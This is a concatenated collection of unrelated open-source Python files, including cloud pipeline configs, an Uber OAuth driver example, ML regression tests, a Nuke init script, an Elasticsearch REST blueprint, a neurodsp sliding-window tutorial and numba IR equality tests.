GCP_AI_PLATFORM_TRAINING_ARGS = {
'project': GOOGLE_CLOUD_PROJECT,
'region': 'us-central1',
# Starting from TFX 0.14, training on AI Platform uses custom containers:
# https://cloud.google.com/ml-engine/docs/containers-overview
# You can specify a custom container here. If not specified, TFX will use
# a public container image matching the installed version of TFX.
# Set your container name below.
'masterConfig': {
'imageUri': 'gcr.io/' + GOOGLE_CLOUD_PROJECT + '/tfx-pipeline'
},
# Note that if you do specify a custom container, ensure the entrypoint
# calls into TFX's run_executor script (tfx/scripts/run_executor.py)
}
# A dict which contains the serving job parameters to be passed to Google
# Cloud AI Platform. For the full set of parameters supported by Google Cloud AI
# Platform, refer to
# https://cloud.google.com/ml-engine/reference/rest/v1/projects.models
GCP_AI_PLATFORM_SERVING_ARGS = {
'model_name': PIPELINE_NAME,
'project_id': GOOGLE_CLOUD_PROJECT,
# The region to use when serving the model. See available regions here:
# https://cloud.google.com/ml-engine/docs/regions
'regions': [GOOGLE_CLOUD_REGION],
}
|
lib/python3.6/site-packages/example/authorize_driver.py | venkyyPoojari/Smart-Mirror | 187 | 18452 | # Copyright (c) 2017 Uber Technologies, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Initializes an UberRidesClient with OAuth 2.0 Credentials.
This example demonstrates how to get an access token through the
OAuth 2.0 Authorization Code Grant and use credentials to create
an UberRidesClient.
To run this example:
(1) Set your app credentials in config.driver.yaml
(2) Run `python authorize_driver.py`
(3) A success message will print, 'Hello {YOUR_NAME}'
(4) User OAuth 2.0 credentials are recorded in
'oauth_driver_session_store.yaml'
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import input
from yaml import safe_dump
from example import utils # NOQA
from example.utils import fail_print
from example.utils import response_print
from example.utils import success_print
from example.utils import import_app_credentials
from uber_rides.auth import AuthorizationCodeGrant
from uber_rides.client import UberRidesClient
from uber_rides.errors import ClientError
from uber_rides.errors import ServerError
from uber_rides.errors import UberIllegalState
def authorization_code_grant_flow(credentials, storage_filename):
"""Get an access token through Authorization Code Grant.
Parameters
credentials (dict)
All your app credentials and information
imported from the configuration file.
storage_filename (str)
Filename to store OAuth 2.0 Credentials.
Returns
(UberRidesClient)
An UberRidesClient with OAuth 2.0 Credentials.
"""
auth_flow = AuthorizationCodeGrant(
credentials.get('client_id'),
credentials.get('scopes'),
credentials.get('client_secret'),
credentials.get('redirect_url'),
)
auth_url = auth_flow.get_authorization_url()
login_message = 'Login as a driver and grant access by going to:\n\n{}\n'
login_message = login_message.format(auth_url)
response_print(login_message)
redirect_url = 'Copy the URL you are redirected to and paste here:\n\n'
result = input(redirect_url).strip()
try:
session = auth_flow.get_session(result)
except (ClientError, UberIllegalState) as error:
fail_print(error)
return
credential = session.oauth2credential
credential_data = {
'client_id': credential.client_id,
'redirect_url': credential.redirect_url,
'access_token': credential.access_token,
'expires_in_seconds': credential.expires_in_seconds,
'scopes': list(credential.scopes),
'grant_type': credential.grant_type,
'client_secret': credential.client_secret,
'refresh_token': credential.refresh_token,
}
with open(storage_filename, 'w') as yaml_file:
yaml_file.write(safe_dump(credential_data, default_flow_style=False))
return UberRidesClient(session, sandbox_mode=True)
def hello_user(api_client):
"""Use an authorized client to fetch and print profile information.
Parameters
api_client (UberRidesClient)
An UberRidesClient with OAuth 2.0 credentials.
"""
try:
response = api_client.get_driver_profile()
except (ClientError, ServerError) as error:
fail_print(error)
return
else:
profile = response.json
first_name = profile.get('first_name')
last_name = profile.get('last_name')
email = profile.get('email')
message = 'Hello, {} {}. Successfully granted access token to {}.'
message = message.format(first_name, last_name, email)
success_print(message)
success_print(profile)
success_print('---')
response = api_client.get_driver_trips()
trips = response.json
success_print(trips)
success_print('---')
response = api_client.get_driver_payments()
payments = response.json
success_print(payments)
if __name__ == '__main__':
"""Run the example.
Get an access token through the OAuth 2.0 Authorization Code Grant
and use credentials to create an UberRidesClient.
"""
credentials = import_app_credentials('config.driver.yaml')
api_client = authorization_code_grant_flow(
credentials,
'oauth_driver_session_store.yaml',
)
hello_user(api_client)
|
topic-db/topicdb/core/models/language.py | anthcp-infocom/Contextualise | 184 | 18523 | <gh_stars>100-1000
"""
Language enumeration. Part of the StoryTechnologies project.
June 12, 2016
<NAME> (<EMAIL>)
"""
from enum import Enum
class Language(Enum):
# https://en.wikipedia.org/wiki/List_of_ISO_639-1_codes
# https://en.wikipedia.org/wiki/ISO_639-2
ENG = 1 # English
SPA = 2 # Spanish
DEU = 3 # German
ITA = 4 # Italian
FRA = 5 # French
NLD = 6 # Dutch
def __str__(self):
return self.name
|
Configuration/StandardSequences/python/L1Reco_cff.py | ckamtsikis/cmssw | 852 | 18543 | <filename>Configuration/StandardSequences/python/L1Reco_cff.py
import FWCore.ParameterSet.Config as cms
from L1Trigger.Configuration.L1TReco_cff import *
|
examples/create_mac_table_entry.py | open-switch/opx-docs | 122 | 18552 | #Python code block to configure MAC address table entry
import cps_utils
#Register the attribute type
cps_utils.add_attr_type('base-mac/table/mac-address', 'mac')
#Define the MAC address, interface index and VLAN attributes
d = {'mac-address': '00:0a:0b:cc:0d:0e', 'ifindex': 18, 'vlan': '100'}
#Create a CPS object
obj = cps_utils.CPSObject('base-mac/table', data=d)
#Associate the operation to the CPS object
tr_obj = ('create', obj.get())
#Create a transaction object
transaction = cps_utils.CPSTransaction([tr_obj])
#Check for failure
ret = transaction.commit()
if not ret:
raise RuntimeError('Error creating MAC Table Entry')
print 'Successfully created'
|
metadata-ingestion/examples/library/dataset_set_tag.py | cuong-pham/datahub | 1,603 | 18557 | # Imports for urn construction utility methods
import logging
from datahub.emitter.mce_builder import make_dataset_urn, make_tag_urn
from datahub.emitter.mcp import MetadataChangeProposalWrapper
from datahub.emitter.rest_emitter import DatahubRestEmitter
# Imports for metadata model classes
from datahub.metadata.schema_classes import (
ChangeTypeClass,
GlobalTagsClass,
TagAssociationClass,
)
log = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
dataset_urn = make_dataset_urn(platform="hive", name="realestate_db.sales", env="PROD")
tag_urn = make_tag_urn("purchase")
event: MetadataChangeProposalWrapper = MetadataChangeProposalWrapper(
entityType="dataset",
changeType=ChangeTypeClass.UPSERT,
entityUrn=dataset_urn,
aspectName="globalTags",
aspect=GlobalTagsClass(tags=[TagAssociationClass(tag=tag_urn)]),
)
# Create rest emitter
rest_emitter = DatahubRestEmitter(gms_server="http://localhost:8080")
rest_emitter.emit(event)
log.info(f"Set tags to {tag_urn} for dataset {dataset_urn}")
|
examples/Old Format/matrix_latex.py | waldyrious/galgebra | 151 | 18558 | from __future__ import print_function
from sympy import symbols, Matrix
from galgebra.printer import xpdf, Format
def main():
Format()
a = Matrix ( 2, 2, ( 1, 2, 3, 4 ) )
b = Matrix ( 2, 1, ( 5, 6 ) )
c = a * b
print(a,b,'=',c)
x, y = symbols ( 'x, y' )
d = Matrix ( 1, 2, ( x ** 3, y ** 3 ))
e = Matrix ( 2, 2, ( x ** 2, 2 * x * y, 2 * x * y, y ** 2 ) )
f = d * e
print('%',d,e,'=',f)
# xpdf()
xpdf(pdfprog=None)
return
if __name__ == "__main__":
main()
|
modules/python3/tests/unittests/scripts/glm.py | ImagiaViz/inviwo | 349 | 18572 | import inviwopy
from inviwopy.glm import *
v1 = vec3(1,2,3)
v2 = size2_t(4,5)
m1 = mat4(1)
m2 = mat3(0,1,0,-1,0,0,0,0,2)
v3 = m2 * v1
v4 = vec4(1,2,3,4)
w = v4.w
a = v4.a
q = v4.q
z = v4.z
b = v4.b
p = v4.p
y = v4.y
g = v4.g
t = v4.t
x = v4.x
r = v4.r
s = v4.s
|
tests/advanced_tests/regressors.py | amlanbanerjee/auto_ml | 1,671 | 18593 | <reponame>amlanbanerjee/auto_ml<filename>tests/advanced_tests/regressors.py
import datetime
import os
import random
import sys
sys.path = [os.path.abspath(os.path.dirname(__file__))] + sys.path
from auto_ml import Predictor
from auto_ml.utils_models import load_ml_model
import dill
from nose.tools import assert_equal, assert_not_equal, with_setup
import numpy as np
from sklearn.model_selection import train_test_split
import utils_testing as utils
def optimize_final_model_regression(model_name=None):
np.random.seed(0)
df_boston_train, df_boston_test = utils.get_boston_regression_dataset()
# We just want to make sure these run, not necessarily make sure that they're super accurate (which takes more time, and is dataset dependent)
df_boston_train = df_boston_train.sample(frac=0.5)
column_descriptions = {
'MEDV': 'output'
, 'CHAS': 'categorical'
}
ml_predictor = Predictor(type_of_estimator='regressor', column_descriptions=column_descriptions)
ml_predictor.train(df_boston_train, optimize_final_model=True, model_names=model_name)
test_score = ml_predictor.score(df_boston_test, df_boston_test.MEDV)
print('test_score')
print(test_score)
# the random seed gets a score of -3.21 on python 3.5
# There's a ton of noise here, due to small sample sizes
lower_bound = -3.4
if model_name == 'DeepLearningRegressor':
lower_bound = -24
if model_name == 'LGBMRegressor':
lower_bound = -16
if model_name == 'GradientBoostingRegressor':
lower_bound = -5.1
if model_name == 'CatBoostRegressor':
lower_bound = -4.5
if model_name == 'XGBRegressor':
lower_bound = -4.8
assert lower_bound < test_score < -2.75
def getting_single_predictions_regression(model_name=None):
np.random.seed(0)
df_boston_train, df_boston_test = utils.get_boston_regression_dataset()
column_descriptions = {
'MEDV': 'output'
, 'CHAS': 'categorical'
}
ml_predictor = Predictor(type_of_estimator='regressor', column_descriptions=column_descriptions)
ml_predictor.train(df_boston_train, model_names=model_name)
file_name = ml_predictor.save(str(random.random()))
saved_ml_pipeline = load_ml_model(file_name)
os.remove(file_name)
try:
keras_file_name = file_name[:-5] + '_keras_deep_learning_model.h5'
os.remove(keras_file_name)
except:
pass
df_boston_test_dictionaries = df_boston_test.to_dict('records')
# 1. make sure the accuracy is the same
predictions = []
for row in df_boston_test_dictionaries:
predictions.append(saved_ml_pipeline.predict(row))
print('predictions')
print(predictions)
print('predictions[0]')
print(predictions[0])
print('type(predictions)')
print(type(predictions))
first_score = utils.calculate_rmse(df_boston_test.MEDV, predictions)
print('first_score')
print(first_score)
# Make sure our score is good, but not unreasonably good
lower_bound = -2.9
if model_name == 'DeepLearningRegressor':
lower_bound = -7.8
if model_name == 'LGBMRegressor':
lower_bound = -4.95
if model_name == 'XGBRegressor':
lower_bound = -3.4
if model_name == 'CatBoostRegressor':
lower_bound = -3.7
assert lower_bound < first_score < -2.7
# 2. make sure the speed is reasonable (do it a few extra times)
data_length = len(df_boston_test_dictionaries)
start_time = datetime.datetime.now()
for idx in range(1000):
row_num = idx % data_length
saved_ml_pipeline.predict(df_boston_test_dictionaries[row_num])
end_time = datetime.datetime.now()
duration = end_time - start_time
print('duration.total_seconds()')
print(duration.total_seconds())
# It's very difficult to set a benchmark for speed that will work across all machines.
# On my 2013 bottom of the line 15" MacBook Pro, this runs in about 0.8 seconds for 1000 predictions
# That's about 1 millisecond per prediction
# Assuming we might be running on a test box that's pretty weak, multiply by 3
# Also make sure we're not running unreasonably quickly
assert 0.1 < duration.total_seconds() / 1.0 < 60
# 3. make sure we're not modifying the dictionaries (the score is the same after running a few experiments as it is the first time)
predictions = []
for row in df_boston_test_dictionaries:
predictions.append(saved_ml_pipeline.predict(row))
second_score = utils.calculate_rmse(df_boston_test.MEDV, predictions)
print('second_score')
print(second_score)
# Make sure our score is good, but not unreasonably good
assert lower_bound < second_score < -2.7
|
software/nuke/init.py | kei-iketani/plex | 153 | 18640 | <filename>software/nuke/init.py
#*********************************************************************
# content = init Nuke
# version = 0.1.0
# date = 2019-12-01
#
# license = MIT <https://github.com/alexanderrichtertd>
# author = <NAME> <<EMAIL>>
#*********************************************************************
import os
import errno
import nuke
import pipefunc
from tank import Tank
#*********************************************************************
# VARIABLE
TITLE = os.path.splitext(os.path.basename(__file__))[0]
LOG = Tank().log.init(script=TITLE)
PROJECT_DATA = Tank().data_project
RESOLUTION = (' ').join([str(PROJECT_DATA['resolution'][0]),
str(PROJECT_DATA['resolution'][1]),
PROJECT_DATA['name'].replace(' ', '')])
#*********************************************************************
# FOLDER CREATION
def create_write_dir():
file_name = nuke.filename(nuke.thisNode())
file_path = os.path.dirname(file_name)
os_path = nuke.callbacks.filenameFilter(file_path)
# cope with the directory existing already by ignoring that exception
try: os.makedirs(os_path)
except OSError, e:
if e.errno != errno.EEXIST:
raise
def add_plugin_paths():
# ADD all IMG paths
for img in os.getenv('IMG_PATH').split(';'):
for img_sub in pipefunc.get_deep_folder_list(path=img, add_path=True):
nuke.pluginAddPath(img_sub)
# ADD sub software paths
for paths in os.getenv('SOFTWARE_SUB_PATH').split(';'):
nuke.pluginAddPath(paths)
#*********************************************************************
# PIPELINE
Tank().init_software()
add_plugin_paths()
try: from scripts import write_node
except: LOG.warning('FAILED loading write_node')
# LOAD paths
try:
for paths in os.getenv('SOFTWARE_SUB_PATH').split(';'):
nuke.pluginAddPath(paths)
except:
LOG.warning('FAILED loading SOFTWARE_SUB_PATH')
print('SETTINGS')
# RESOLUTION *********************************************************************
try:
nuke.addFormat(RESOLUTION)
nuke.knobDefault('Root.format', PROJECT_DATA['name'].replace(' ', ''))
print(' {} ON - {}'.format(chr(254), RESOLUTION))
except:
LOG.error(' OFF - {}'.format(RESOLUTION), exc_info=True)
print(' {} OFF - {}'.format(chr(254), RESOLUTION))
# FPS *********************************************************************
try:
nuke.knobDefault("Root.fps", str(PROJECT_DATA['fps']))
print(' {} ON - {} fps'.format(chr(254), PROJECT_DATA['fps']))
except:
LOG.error(' OFF - {} fps'.format(PROJECT_DATA['fps']), exc_info=True)
print(' {} OFF - {} fps'.format(chr(254), PROJECT_DATA['fps']))
# createFolder *********************************************************************
try:
nuke.addBeforeRender(create_write_dir)
print(' {} ON - create_write_dir (before render)'.format(chr(254)))
except:
LOG.error(' OFF - create_write_dir (before render)'.format(chr(254)), exc_info=True)
print(' {} OFF - create_write_dir (before render)'.format(chr(254)))
print('')
|
glasses/models/classification/base/__init__.py | rentainhe/glasses | 271 | 18643 | from torch import Tensor, nn
from ...base import VisionModule
class ClassificationModule(VisionModule):
"""Base Classification Module class"""
def __init__(
self,
encoder: nn.Module,
head: nn.Module,
in_channels: int = 3,
n_classes: int = 1000,
**kwargs
):
super().__init__()
self.encoder = encoder(in_channels=in_channels, **kwargs)
self.head = head(self.encoder.widths[-1], n_classes)
self.initialize()
def initialize(self):
pass
def forward(self, x: Tensor) -> Tensor:
x = self.encoder(x)
x = self.head(x)
return x
|
comrade/blueprints/rest.py | sp3c73r2038/elasticsearch-comrade | 256 | 18647 | from elasticsearch import TransportError
from sanic import Blueprint
from sanic.request import Request
from sanic.response import HTTPResponse, json
from ..connections import get_client
rest_bp = Blueprint('rest')
def format_es_exception(e: TransportError):
return json({"status_code": e.status_code,
"error": e.error,
"info": e.info})
@rest_bp.route('/query', methods=['POST'])
async def close_index(request: Request) -> HTTPResponse:
client = get_client(request)
body = request.json['body']
method = request.json['method']
path = request.json['path']
try:
resp = await client.transport.perform_request(method, path, body=body)
except TransportError as e:
return format_es_exception(e)
return json(resp)
|
tests/test_utils.py | tedeler/pyexchange | 128 | 18648 | <gh_stars>100-1000
from datetime import datetime
from pytz import timezone, utc
from pytest import mark
from pyexchange.utils import convert_datetime_to_utc
def test_converting_none_returns_none():
assert convert_datetime_to_utc(None) is None
def test_converting_non_tz_aware_date_returns_tz_aware():
utc_time = datetime(year=2014, month=1, day=1, hour=1, minute=1, second=1)
assert utc_time.tzinfo is None
assert convert_datetime_to_utc(utc_time) == datetime(year=2014, month=1, day=1, hour=1, minute=1, second=1, tzinfo=utc)
def test_converting_tz_aware_date_returns_tz_aware_date():
# US/Pacific timezone is UTC-07:00 (In April we are in DST)
# We use localize() because according to the pytz documentation, using the tzinfo
# argument of the standard datetime constructors does not work for timezones with DST.
pacific_time = timezone("US/Pacific").localize(datetime(year=2014, month=4, day=1, hour=1, minute=0, second=0))
utc_time = utc.localize(datetime(year=2014, month=4, day=1, hour=8, minute=0, second=0))
assert convert_datetime_to_utc(pacific_time) == utc_time
|
section_11_(api)/dicts_and_lists.py | hlcooll/python_lessons | 425 | 18716 | <filename>section_11_(api)/dicts_and_lists.py
# Dictionaries and lists, together
# Loading from https://raw.githubusercontent.com/shannonturner/education-compliance-reports/master/investigations.json
investigations = {
"type": "FeatureCollection",
"features": [
{
"type": "Feature",
"geometry": {
"type": "Point",
"coordinates": [
-112.073032,
33.453527
]
},
"properties": {
"marker-symbol": "marker",
"marker-color": "#D4500F",
"address": " AZ ",
"name": "Arizona State University"
}
},
{
"type": "Feature",
"geometry": {
"type": "Point",
"coordinates": [
-121.645734,
39.648248
]
},
"properties": {
"marker-symbol": "marker",
"marker-color": "#D4500F",
"address": " CA ",
"name": "Butte-Glen Community College District"
}
},
]
}
# The first level is a dictionary with two keys: type and features
# type's value is a string: FeatureCollection
# features' value is a list of dictionaries
# We're going to focus on the features list.
# Each item in the features list is a dictionary that has three keys: type, geometry, and properties
# If we wanted to access all of the properies for the first map point, here's how:
print investigations['features'][0]['properties']
# list of dictionaries ^ ^ ^
# first map point | | properties
# {
# "marker-symbol": "marker",
# "marker-color": "#D4500F",
# "address": " AZ ",
# "name": "Arizona State University"
# }
# As we see above, properties is itself a dictionary
# To get the name of that map point:
print investigations['features'][0]['properties']['name']
# Arizona State University
# Generally speaking, if what's between the square brackets is a number, you're accessing a list.
# If it's a string, you're accessing a dictionary.
# If you get stuck or are getting errors, try printing out the item and the key or index. |
veinmind-backdoor/register.py | Jqqzzz/veinmind-tools | 364 | 18721 | class register:
plugin_dict = {}
plugin_name = []
@classmethod
def register(cls, plugin_name):
def wrapper(plugin):
cls.plugin_dict[plugin_name] = plugin
return plugin
return wrapper |
tutorials/rhythm/plot_SlidingWindowMatching.py | bcmartinb/neurodsp | 154 | 18740 | """
Sliding Window Matching
=======================
Find recurring patterns in neural signals using Sliding Window Matching.
This tutorial primarily covers the :func:`~.sliding_window_matching` function.
"""
###################################################################################################
# Overview
# --------
#
# Non-periodic or non-sinusoidal properties can be difficult to assess in frequency domain
# methods. To try and address this, the sliding window matching (SWM) algorithm has been
# proposed for detecting and measuring recurring, but unknown, patterns in time series data.
# Patterns of interest may be transient events, and/or the waveform shape of neural oscillations.
#
# In this example, we will explore applying the SWM algorithm to some LFP data.
#
# The SWM approach tries to find recurring patterns (or motifs) in the data, using sliding
# windows. An iterative process samples window randomly, and compares each to the average
# window. The goal is to find a selection of windows that look maximally like the average
# window, at which point the occurrences of the window have been detected, and the average
# window pattern can be examined.
#
# The sliding window matching algorithm is described in
# `Gips et al, 2017 <https://doi.org/10.1016/j.jneumeth.2016.11.001>`_
#
###################################################################################################
# sphinx_gallery_thumbnail_number = 2
import numpy as np
# Import the sliding window matching function
from neurodsp.rhythm import sliding_window_matching
# Import utilities for loading and plotting data
from neurodsp.utils.download import load_ndsp_data
from neurodsp.plts.rhythm import plot_swm_pattern
from neurodsp.plts.time_series import plot_time_series
from neurodsp.utils import set_random_seed, create_times
from neurodsp.utils.norm import normalize_sig
###################################################################################################
# Set random seed, for reproducibility
set_random_seed(0)
###################################################################################################
# Load neural signal
# ------------------
#
# First, we will load a segment of ECoG data, as an example time series.
#
###################################################################################################
# Download, if needed, and load example data files
sig = load_ndsp_data('sample_data_1.npy', folder='data')
sig = normalize_sig(sig, mean=0, variance=1)
# Set sampling rate, and create a times vector for plotting
fs = 1000
times = create_times(len(sig)/fs, fs)
###################################################################################################
#
# Next, we can visualize this data segment. As we can see this segment of data has
# some prominent bursts of oscillations, in this case, in the beta frequency.
#
###################################################################################################
# Plot example signal
plot_time_series(times, sig)
###################################################################################################
# Apply sliding window matching
# -----------------------------
#
# The beta oscillation in our data segment looks like it might have some non-sinusoidal
# properties. We can investigate this with sliding window matching.
#
# Sliding window matching can be applied with the
# :func:`~.sliding_window_matching` function.
#
###################################################################################################
# Data Preprocessing
# ~~~~~~~~~~~~~~~~~~
#
# Typically, the input signal does not have to be filtered into a band of interest to use SWM.
#
# If the goal is to characterize non-sinusoidal rhythms, you typically won't want to
# apply a filter that will smooth out the features of interest.
#
# However, if the goal is to characterize higher frequency activity, it can be useful to
# apply a highpass filter, so that the method does not converge on a lower frequency motif.
#
# In our case, the beta rhythm of interest is the most prominent, low frequency, feature of the
# data, so we won't apply a filter.
#
###################################################################################################
# Algorithm Settings
# ~~~~~~~~~~~~~~~~~~
#
# The SWM algorithm has some algorithm specific settings that need to be applied, including:
#
# - `win_len` : the length of the window, defined in seconds
# - `win_spacing` : the minimum distance between windows, also defined in seconds
#
# The length of the window influences the patterns that are extracted from the data.
# Typically, you want to set the window length to match the expected timescale of the
# patterns under study.
#
# For our purposes, we will define the window length to be about 1 cycle of a beta oscillation,
# which should help the algorithm to find the waveform shape of the neural oscillation.
#
###################################################################################################
# Define window length & minimum window spacing, both in seconds
win_len = .055
win_spacing = .055
###################################################################################################
# Apply the sliding window matching algorithm to the time series
windows, window_starts = sliding_window_matching(sig, fs, win_len, win_spacing, var_thresh=.5)
###################################################################################################
# Examine the Results
# ~~~~~~~~~~~~~~~~~~~
#
# What we got back from the SWM function are the calculate average window, the list
# of indices in the data of the windows, and the calculated costs for each iteration of
# the algorithm run.
#
# In order to visualize the resulting pattern, we can use
# :func:`~.plot_swm_pattern`.
#
###################################################################################################
# Compute the average window
avg_window = np.mean(windows, 0)
# Plot the discovered pattern
plot_swm_pattern(avg_window)
###################################################################################################
#
# In the above average pattern, that looks to capture a beta rhythm, we can notice some
# waveform shape of the extracted rhythm.
#
###################################################################################################
# Concluding Notes
# ~~~~~~~~~~~~~~~~
#
# One thing to keep in mind is that the SWM algorithm includes a random element of sampling
# and comparing the windows - meaning it is not deterministic. Because of this, results
# can change with different random seeds.
#
# To explore this, go back and change the random seed, and see how the output changes.
#
# You can also set the number of iterations that the algorithm sweeps through. Increasing
# the number of iterations, and using longer data segments, can help improve the robustness
# of the algorithm results.
#
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/numba/tests/test_ir.py | BadDevCode/lumberyard | 1,738 | 18778 | <reponame>BadDevCode/lumberyard
from __future__ import print_function
import numba.unittest_support as unittest
from numba import compiler, ir, objmode
import numpy as np
class TestIR(unittest.TestCase):
def test_IRScope(self):
filename = "<?>"
top = ir.Scope(parent=None, loc=ir.Loc(filename=filename, line=1))
local = ir.Scope(parent=top, loc=ir.Loc(filename=filename, line=2))
apple = local.define('apple', loc=ir.Loc(filename=filename, line=3))
self.assertIs(local.get('apple'), apple)
self.assertEqual(len(local.localvars), 1)
orange = top.define('orange', loc=ir.Loc(filename=filename, line=4))
self.assertEqual(len(local.localvars), 1)
self.assertEqual(len(top.localvars), 1)
self.assertIs(top.get('orange'), orange)
self.assertIs(local.get('orange'), orange)
more_orange = local.define('orange', loc=ir.Loc(filename=filename,
line=5))
self.assertIs(top.get('orange'), orange)
self.assertIsNot(local.get('orange'), not orange)
self.assertIs(local.get('orange'), more_orange)
try:
local.define('orange', loc=ir.Loc(filename=filename, line=5))
except ir.RedefinedError:
pass
else:
self.fail("Expecting an %s" % ir.RedefinedError)
class CheckEquality(unittest.TestCase):
var_a = ir.Var(None, 'a', ir.unknown_loc)
var_b = ir.Var(None, 'b', ir.unknown_loc)
var_c = ir.Var(None, 'c', ir.unknown_loc)
var_d = ir.Var(None, 'd', ir.unknown_loc)
var_e = ir.Var(None, 'e', ir.unknown_loc)
loc1 = ir.Loc('mock', 1, 0)
loc2 = ir.Loc('mock', 2, 0)
loc3 = ir.Loc('mock', 3, 0)
def check(self, base, same=[], different=[]):
for s in same:
self.assertTrue(base == s)
for d in different:
self.assertTrue(base != d)
class TestIRMeta(CheckEquality):
"""
Tests IR node meta, like Loc and Scope
"""
def test_loc(self):
a = ir.Loc('file', 1, 0)
b = ir.Loc('file', 1, 0)
c = ir.Loc('pile', 1, 0)
d = ir.Loc('file', 2, 0)
e = ir.Loc('file', 1, 1)
self.check(a, same=[b,], different=[c, d, e])
f = ir.Loc('file', 1, 0, maybe_decorator=False)
g = ir.Loc('file', 1, 0, maybe_decorator=True)
self.check(a, same=[f, g])
def test_scope(self):
parent1 = ir.Scope(None, self.loc1)
parent2 = ir.Scope(None, self.loc1)
parent3 = ir.Scope(None, self.loc2)
self.check(parent1, same=[parent2, parent3,])
a = ir.Scope(parent1, self.loc1)
b = ir.Scope(parent1, self.loc1)
c = ir.Scope(parent1, self.loc2)
d = ir.Scope(parent3, self.loc1)
self.check(a, same=[b, c, d])
# parent1 and parent2 are equal, so children referring to either parent
# should be equal
e = ir.Scope(parent2, self.loc1)
self.check(a, same=[e,])
class TestIRNodes(CheckEquality):
"""
Tests IR nodes
"""
def test_terminator(self):
# terminator base class inst should always be equal
t1 = ir.Terminator()
t2 = ir.Terminator()
self.check(t1, same=[t2])
def test_jump(self):
a = ir.Jump(1, self.loc1)
b = ir.Jump(1, self.loc1)
c = ir.Jump(1, self.loc2)
d = ir.Jump(2, self.loc1)
self.check(a, same=[b, c], different=[d])
def test_return(self):
a = ir.Return(self.var_a, self.loc1)
b = ir.Return(self.var_a, self.loc1)
c = ir.Return(self.var_a, self.loc2)
d = ir.Return(self.var_b, self.loc1)
self.check(a, same=[b, c], different=[d])
def test_raise(self):
a = ir.Raise(self.var_a, self.loc1)
b = ir.Raise(self.var_a, self.loc1)
c = ir.Raise(self.var_a, self.loc2)
d = ir.Raise(self.var_b, self.loc1)
self.check(a, same=[b, c], different=[d])
def test_staticraise(self):
a = ir.StaticRaise(AssertionError, None, self.loc1)
b = ir.StaticRaise(AssertionError, None, self.loc1)
c = ir.StaticRaise(AssertionError, None, self.loc2)
e = ir.StaticRaise(AssertionError, ("str",), self.loc1)
d = ir.StaticRaise(RuntimeError, None, self.loc1)
self.check(a, same=[b, c], different=[d, e])
def test_branch(self):
a = ir.Branch(self.var_a, 1, 2, self.loc1)
b = ir.Branch(self.var_a, 1, 2, self.loc1)
c = ir.Branch(self.var_a, 1, 2, self.loc2)
d = ir.Branch(self.var_b, 1, 2, self.loc1)
e = ir.Branch(self.var_a, 2, 2, self.loc1)
f = ir.Branch(self.var_a, 1, 3, self.loc1)
self.check(a, same=[b, c], different=[d, e, f])
def test_expr(self):
a = ir.Expr('some_op', self.loc1)
b = ir.Expr('some_op', self.loc1)
c = ir.Expr('some_op', self.loc2)
d = ir.Expr('some_other_op', self.loc1)
self.check(a, same=[b, c], different=[d])
def test_setitem(self):
a = ir.SetItem(self.var_a, self.var_b, self.var_c, self.loc1)
b = ir.SetItem(self.var_a, self.var_b, self.var_c, self.loc1)
c = ir.SetItem(self.var_a, self.var_b, self.var_c, self.loc2)
d = ir.SetItem(self.var_d, self.var_b, self.var_c, self.loc1)
e = ir.SetItem(self.var_a, self.var_d, self.var_c, self.loc1)
f = ir.SetItem(self.var_a, self.var_b, self.var_d, self.loc1)
self.check(a, same=[b, c], different=[d, e, f])
def test_staticsetitem(self):
a = ir.StaticSetItem(self.var_a, 1, self.var_b, self.var_c, self.loc1)
b = ir.StaticSetItem(self.var_a, 1, self.var_b, self.var_c, self.loc1)
c = ir.StaticSetItem(self.var_a, 1, self.var_b, self.var_c, self.loc2)
d = ir.StaticSetItem(self.var_d, 1, self.var_b, self.var_c, self.loc1)
e = ir.StaticSetItem(self.var_a, 2, self.var_b, self.var_c, self.loc1)
f = ir.StaticSetItem(self.var_a, 1, self.var_d, self.var_c, self.loc1)
g = ir.StaticSetItem(self.var_a, 1, self.var_b, self.var_d, self.loc1)
self.check(a, same=[b, c], different=[d, e, f, g])
def test_delitem(self):
a = ir.DelItem(self.var_a, self.var_b, self.loc1)
b = ir.DelItem(self.var_a, self.var_b, self.loc1)
c = ir.DelItem(self.var_a, self.var_b, self.loc2)
d = ir.DelItem(self.var_c, self.var_b, self.loc1)
e = ir.DelItem(self.var_a, self.var_c, self.loc1)
self.check(a, same=[b, c], different=[d, e])
def test_del(self):
a = ir.Del(self.var_a.name, self.loc1)
b = ir.Del(self.var_a.name, self.loc1)
c = ir.Del(self.var_a.name, self.loc2)
d = ir.Del(self.var_b.name, self.loc1)
self.check(a, same=[b, c], different=[d])
def test_setattr(self):
a = ir.SetAttr(self.var_a, 'foo', self.var_b, self.loc1)
b = ir.SetAttr(self.var_a, 'foo', self.var_b, self.loc1)
c = ir.SetAttr(self.var_a, 'foo', self.var_b, self.loc2)
d = ir.SetAttr(self.var_c, 'foo', self.var_b, self.loc1)
e = ir.SetAttr(self.var_a, 'bar', self.var_b, self.loc1)
f = ir.SetAttr(self.var_a, 'foo', self.var_c, self.loc1)
self.check(a, same=[b, c], different=[d, e, f])
def test_delattr(self):
a = ir.DelAttr(self.var_a, 'foo', self.loc1)
b = ir.DelAttr(self.var_a, 'foo', self.loc1)
c = ir.DelAttr(self.var_a, 'foo', self.loc2)
d = ir.DelAttr(self.var_c, 'foo', self.loc1)
e = ir.DelAttr(self.var_a, 'bar', self.loc1)
self.check(a, same=[b, c], different=[d, e])
